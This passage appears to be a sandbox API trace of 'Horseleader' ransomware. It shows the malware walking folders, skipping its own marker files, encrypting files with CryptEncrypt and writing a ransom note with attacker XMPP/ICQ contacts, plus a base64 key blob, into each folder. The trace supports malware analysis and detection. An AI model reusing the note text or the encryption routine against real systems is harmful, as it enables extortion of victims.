dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.209] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.209] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.210] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.210] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.210] CloseHandle (hObject=0x158) returned 1 [0234.210] GetProcessHeap () returned 0x780000 [0234.210] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.210] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0234.210] lstrcmpiW (lpString1="lv-LV", lpString2="Windows") returned -1 [0234.210] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned 60 [0234.211] lstrcmpW (lpString1="lv-LV", lpString2=".") returned 1 [0234.211] lstrcmpW (lpString1="lv-LV", lpString2="..") returned 1 [0234.211] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.211] GetProcessHeap () returned 0x780000 [0234.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.211] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*") returned 62 [0234.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.212] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\.") returned 62 [0234.212] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.212] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.212] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\..") returned 63 [0234.212] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.212] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.212] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.212] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui") returned 76 [0234.212] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.212] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.212] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.212] lstrlenW (lpString=".testttjffg") returned 11 [0234.212] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.212] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.213] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.213] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.213] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.213] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\#Decrypt#.txt") returned 74 [0234.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.214] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.214] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.215] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.215] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.215] CloseHandle (hObject=0x158) returned 1 [0234.216] GetProcessHeap () returned 0x780000 [0234.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.216] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e22d6e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x69e22d6e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x3188e7b0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a0200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0234.216] lstrcmpiW (lpString1="micaut.dll", lpString2="Windows") returned -1 [0234.216] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll") returned 65 [0234.216] StrStrIW (lpFirst="micaut.dll", lpSrch=".horseleader") returned 0x0 [0234.216] lstrcmpW (lpString1="micaut.dll", lpString2="#Decrypt#.txt") returned 1 [0234.216] lstrcmpW (lpString1="micaut.dll", lpString2="_uninstalling_.png") returned 1 [0234.216] lstrlenW (lpString=".testttjffg") returned 11 [0234.216] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll", lpSrch=".testttjffg") returned 0x0 [0234.216] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.216] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.217] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x472c5956, ftCreationTime.dwHighDateTime=0x1ca040e, ftLastAccessTime.dwLowDateTime=0xa4945a00, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0x9fcc4285, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0234.217] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="Windows") returned -1 [0234.217] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll") returned 72 [0234.217] StrStrIW (lpFirst="Microsoft.Ink.dll", lpSrch=".horseleader") returned 0x0 [0234.218] lstrcmpW (lpString1="Microsoft.Ink.dll", lpString2="#Decrypt#.txt") returned 1 [0234.218] lstrcmpW (lpString1="Microsoft.Ink.dll", lpString2="_uninstalling_.png") returned 1 [0234.218] lstrlenW (lpString=".testttjffg") returned 11 [0234.218] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll", lpSrch=".testttjffg") returned 0x0 [0234.218] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.218] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.218] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12394d3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa12394d3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa125f634, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x179c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0234.218] lstrcmpiW (lpString1="mip.exe", lpString2="Windows") returned -1 [0234.218] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe") returned 62 [0234.218] StrStrIW (lpFirst="mip.exe", lpSrch=".horseleader") returned 0x0 [0234.218] lstrcmpW (lpString1="mip.exe", lpString2="#Decrypt#.txt") returned 1 [0234.218] lstrcmpW (lpString1="mip.exe", lpString2="_uninstalling_.png") returned 1 [0234.218] lstrlenW (lpString=".testttjffg") returned 11 [0234.219] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe", lpSrch=".testttjffg") returned 0x0 [0234.219] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.219] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.219] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ad46e47, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5ad46e47, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x344e2230, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x609c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0234.219] lstrcmpiW (lpString1="mraut.dll", lpString2="Windows") returned -1 [0234.219] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll") returned 64 [0234.219] StrStrIW (lpFirst="mraut.dll", lpSrch=".horseleader") returned 0x0 [0234.219] lstrcmpW (lpString1="mraut.dll", lpString2="#Decrypt#.txt") returned 1 [0234.220] lstrcmpW (lpString1="mraut.dll", lpString2="_uninstalling_.png") returned 1 [0234.220] lstrlenW (lpString=".testttjffg") returned 11 [0234.220] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll", lpSrch=".testttjffg") returned 0x0 [0234.220] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.220] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.220] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.220] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c00201, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x66c00201, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x34eb4c90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0234.220] lstrcmpiW (lpString1="mshwgst.dll", lpString2="Windows") returned -1 [0234.220] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll") returned 66 [0234.220] StrStrIW (lpFirst="mshwgst.dll", lpSrch=".horseleader") returned 0x0 [0234.220] lstrcmpW (lpString1="mshwgst.dll", lpString2="#Decrypt#.txt") returned 1 [0234.220] lstrcmpW (lpString1="mshwgst.dll", lpString2="_uninstalling_.png") returned 1 [0234.220] lstrlenW (lpString=".testttjffg") returned 11 [0234.221] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll", lpSrch=".testttjffg") returned 0x0 [0234.221] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.221] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.221] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.221] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901e133e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x901e133e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x353c2bb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x105a00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0234.221] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="Windows") returned -1 [0234.221] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll") returned 68 [0234.221] StrStrIW (lpFirst="mshwLatin.dll", lpSrch=".horseleader") returned 0x0 [0234.221] lstrcmpW (lpString1="mshwLatin.dll", lpString2="#Decrypt#.txt") returned 1 [0234.221] lstrcmpW (lpString1="mshwLatin.dll", lpString2="_uninstalling_.png") returned 1 [0234.221] lstrlenW (lpString=".testttjffg") returned 11 [0234.221] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll", lpSrch=".testttjffg") returned 0x0 